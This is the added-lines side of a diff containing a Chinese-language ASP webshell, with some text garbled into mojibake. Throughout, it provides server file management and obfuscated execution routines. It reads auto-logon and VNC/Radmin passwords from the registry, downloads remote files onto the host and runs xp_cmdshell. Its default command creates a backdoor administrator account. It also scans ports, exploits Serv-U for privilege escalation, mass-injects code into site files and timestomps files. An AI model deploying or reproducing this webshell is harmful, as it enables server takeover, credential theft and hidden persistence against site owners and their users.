+Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each F in FOLD.subfolders
+SI=SI&"<td height=10 width=17% align=center><div style='border:1px solid "&BorderColor&"'>"
+SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����""><font face='wingdings' size='6'>0</font><br>"&F.Name&"</a>" 
+SI=SI&"<br><b>[</b><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'onclick='return yesok()' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'onclick='return yesok()' class='am' title='����'>Down</a><b>]</b></div></td>"
+i=i+1
+If i mod 5 = 0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+RRS SI:SI="":i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each L in Fold.files
+SI=SI&"<td height='30'><div style='border:1px solid "&BorderColor&"'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='5'>2</font>"&L.Name&"</a> <b>[</b> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+Si=Si&"<a  href='###' class='am' ><font color=blue >Ȩ��</font></a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"<font color=red >��</font>"
+end if
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a> <b>]</b> - "
+
+SI=SI&clng(L.size/1024)&"K<br><b>"
+SI=SI&L.Type&"</b> <i> - "
+SI=SI&L.DateLastModified&"</i></div></td>"
+i=i+1
+If i mod 2 = 0 then SI=SI&"</tr><tr>"
+Next
+ RRS SI&"</tr></table>"
+Set FOLD=Nothing
+End function:
+
+
+
+
+Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:RRS ""&copyurl&"":Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user 80sec 80sec /add & net localgroup administrators 80sec /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:
+:Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>��*�</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user 80sec 80sec /add & net localgroup administrators 80sec /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·?q��:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
